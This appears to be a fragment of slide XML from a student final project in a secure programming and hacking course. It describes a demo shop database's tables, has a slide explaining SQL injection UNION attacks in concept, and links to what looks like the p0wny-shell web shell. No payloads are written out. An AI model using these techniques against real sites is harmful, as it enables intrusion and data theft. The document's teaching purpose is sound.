            <ac:picMk id="3" creationId="{DA92987D-4C35-2C0E-C612-1BB2C53520CB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:20:53.139" v="388"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="107699499" sldId="331"/>
            <ac:picMk id="4" creationId="{BBC676E8-E69A-087C-DB51-F08EED3B958A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:25:17.285" v="449" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="107699499" sldId="331"/>
            <ac:picMk id="5" creationId="{DF1EE065-D595-EE1B-D3B4-63529C2772A4}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:23:50.627" v="418" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2595393622" sldId="332"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:22:24.094" v="409" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2595393622" sldId="332"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:22:45.329" v="414" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2595393622" sldId="332"/>
            <ac:spMk id="8" creationId="{5E2348F6-F071-0CB8-4628-60203D089F5C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:23:50.627" v="418" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2595393622" sldId="332"/>
            <ac:spMk id="10" creationId="{D8B5D2FA-18F6-131B-C19C-4DC0873F7CFA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:23:01.767" v="416" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2595393622" sldId="332"/>
            <ac:spMk id="11" creationId="{DC5AD5A0-89EE-3390-1890-6087955113A2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:20:48.233" v="385"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2595393622" sldId="332"/>
            <ac:picMk id="3" creationId="{DA92987D-4C35-2C0E-C612-1BB2C53520CB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:20:49.952" v="386"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2595393622" sldId="332"/>
            <ac:picMk id="4" creationId="{BBC676E8-E69A-087C-DB51-F08EED3B958A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:21:50" v="400" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2595393622" sldId="332"/>
            <ac:picMk id="5" creationId="{EA2A9B98-858B-E8FD-3C8F-33D7F7C841A5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{ACA2C813-C457-49C6-AF99-BFB29150CB0F}" dt="2023-06-12T19:21:47.734" v="399" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2595393622" sldId="332"/>
            <ac:picMk id="6" creationId="{BA65DEFF-18B8-C003-9C3A-E7FC04E30082}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{2924D72D-DEC0-474D-8E70-C74212593B2A}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{2924D72D-DEC0-474D-8E70-C74212593B2A}" dt="2023-06-15T19:55:18.018" v="3" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{2924D72D-DEC0-474D-8E70-C74212593B2A}" dt="2023-06-15T19:55:18.018" v="3" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3771669125" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="林 佳笙" userId="739835b6571bf3a2" providerId="Windows Live" clId="Web-{2924D72D-DEC0-474D-8E70-C74212593B2A}" dt="2023-06-15T19:55:18.018" v="3" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3771669125" sldId="260"/>
            <ac:spMk id="3" creationId="{BBE2FA8D-9C6C-6A15-4330-D62545A91D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85781-14CF-AD46-8418-744F861D8767}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/6/16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79FC2-ABAB-904D-AF7C-D563A28E6D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427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由於上課介紹過，所以在這裡不再贅述。並且也不進行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW"/>
              <a:t>DEMO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79FC2-ABAB-904D-AF7C-D563A28E6D65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641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由於上課介紹過，所以在這裡不再贅述。並且也不進行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW"/>
              <a:t>DEMO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79FC2-ABAB-904D-AF7C-D563A28E6D65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492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3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4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4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4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5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2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165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s1wS0aHIij4?feature=oembed" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/s1wS0aHIij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bQK_o6gewg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CbQK_o6gewg?feature=oembed" TargetMode="Externa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aBLsF7vhIU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5aBLsF7vhIU?feature=oembed" TargetMode="External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jcaA1Mwspk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jcaA1Mwspk?feature=oembed" TargetMode="External"/><Relationship Id="rId4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kQ8YZRyPS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kQ8YZRyPSw?feature=oembed" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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1NNvly3Gf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1NNvly3Gfc?feature=oembed" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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xRXmFCEB80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PxRXmFCEB80?feature=oembed" TargetMode="External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ozz/p0wny-shel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5B186-A802-90E0-5E49-C79B4D1A3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58" y="1321598"/>
            <a:ext cx="8409818" cy="3255264"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全程式設計</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>與駭客攻防技術 期末專案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8BE274-49E3-FA6C-F224-8087E9EB0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25" y="4693396"/>
            <a:ext cx="7315200" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>組 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRP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1092950</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>林佳笙 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1093332</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>商東峻 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ 1094841</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>李昱佑</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51509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9273D-0340-2676-7C40-0340B2A8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Users</a:t>
            </a:r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9FFE2C-0E42-96BB-0DD5-048EC474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502" y="2715711"/>
            <a:ext cx="6502400" cy="2514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CC2209E-36CA-46FF-16D2-51759A05DA48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4151709" y="213093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/>
              <a:t>記錄使用者帳號密碼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251609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221B9-6B43-1257-8575-D7A39F4C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product</a:t>
            </a:r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06D299-4B7C-E042-C8E4-FE4F0262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89" y="2590680"/>
            <a:ext cx="8710425" cy="415112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95E3ECE-60C7-FE2A-B8A9-157E8B5594CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2479776" y="2005905"/>
            <a:ext cx="7221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/>
              <a:t>記錄商品的資訊</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="3200"/>
              <a:t>共</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="3200"/>
              <a:t>個商品，共分</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="3200"/>
              <a:t>類</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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279349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47A5F-0FDA-3B24-E953-C44356D9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err="1"/>
              <a:t>User_profile_photo</a:t>
            </a:r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70303AA-6EA6-20CA-A5E7-43383246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51" y="2841458"/>
            <a:ext cx="7124700" cy="25527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1CACB27-DFF1-50AD-831F-F3CA9C6BA7DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4151709" y="215541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/>
              <a:t>記錄使用者的大頭貼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102766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9A552-49D8-4B19-CD72-114E5CCA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stock</a:t>
            </a:r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83CB3B-5A5D-FB8D-EEDA-0E6BCACD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86" y="1944546"/>
            <a:ext cx="4028287" cy="480928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B1DDDA7-2D96-4374-7B5E-0E96D09704F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6090702" y="1944546"/>
            <a:ext cx="463139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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>記錄商品的庫存</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" b="1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b="1" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>product_id</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" b="1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TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>商品</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>id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TW" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>1~20  (20</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>個商品</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj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b="1" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>stored_id</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" b="1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TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>商家</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>id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kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>1~3    (3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>個分店</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>台北</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>嘉義</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>高雄</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea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kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>value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kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>庫存量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63901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2CFA4E-3F7C-0C12-EB92-F02501F1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err="1"/>
              <a:t>Page_visits</a:t>
            </a:r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828274-8339-3161-2578-0E2F2394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183364"/>
            <a:ext cx="7504446" cy="417113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5EAB136-6401-B892-CB4E-64BC9AF6F931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8069973" y="2048718"/>
            <a:ext cx="412202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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>記錄每次瀏覽的行為</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" b="1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b="1" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>tracking_id</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" b="1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TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>新增的同時會</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>setcookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>給使用者</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000"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TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>在新的使用者瀏覽時，亂數生成</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="200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b="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>timestamp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TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>記錄該</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>tracking_id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>瀏覽網頁的時間點</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="200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b="1" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>page_name</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" b="1">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>記錄該時間瀏覽的網頁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361525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7FF71D-8D74-2726-08B3-9C4C8AAD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SQL injection UNION attack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="54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808091A2-A8F8-B048-C588-3E8485E4E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43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9900E-8EB7-7079-C03C-3D660806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UNION??</a:t>
            </a:r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AB65F3-5B7A-0E93-CD23-C6525FC3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49" y="2357434"/>
            <a:ext cx="8953102" cy="163583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884F85D-A7E5-2EC8-3F8A-7026BF700769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2546430" y="4355181"/>
            <a:ext cx="70885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 UNION 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用來將兩個</a:t>
            </a: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以上</a:t>
            </a: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) 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SQL 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查詢的表合併起來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而兩張要併起來的表</a:t>
            </a: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欄位的個數要是相同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-apple-system"/>
              </a:rPr>
              <a:t>相對應的欄位需要是相同的資料型別</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1485195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圓角矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1F3E56-602E-97C1-118F-AEBB336FA5DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2965048" y="1920633"/>
            <a:ext cx="6261904" cy="17212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9D1F2EE-40ED-CF36-FB98-0440C280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UNION??</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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332CEEB-2E8D-56F0-EE4C-DECCA630D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848614"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3147402" y="2296610"/>
          <a:ext cx="2626006" cy="1165860"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1313003">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1268439129"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1313003">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="31858747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ID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Name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801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李昱佑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74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商東俊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7784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F96AA6-F7DA-2728-0981-9502FC4F7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577624"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6452884" y="2289965"/>
          <a:ext cx="2626008" cy="777240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1313004">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3755255940"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1313004">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2482467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ID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Name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194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林佳笙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35986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CB2E20E7-0E7A-4DE1-C703-5A9BDE010CA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3147402" y="1920633"/>
            <a:ext cx="2626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i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>組成員表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike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en" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>GroupA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
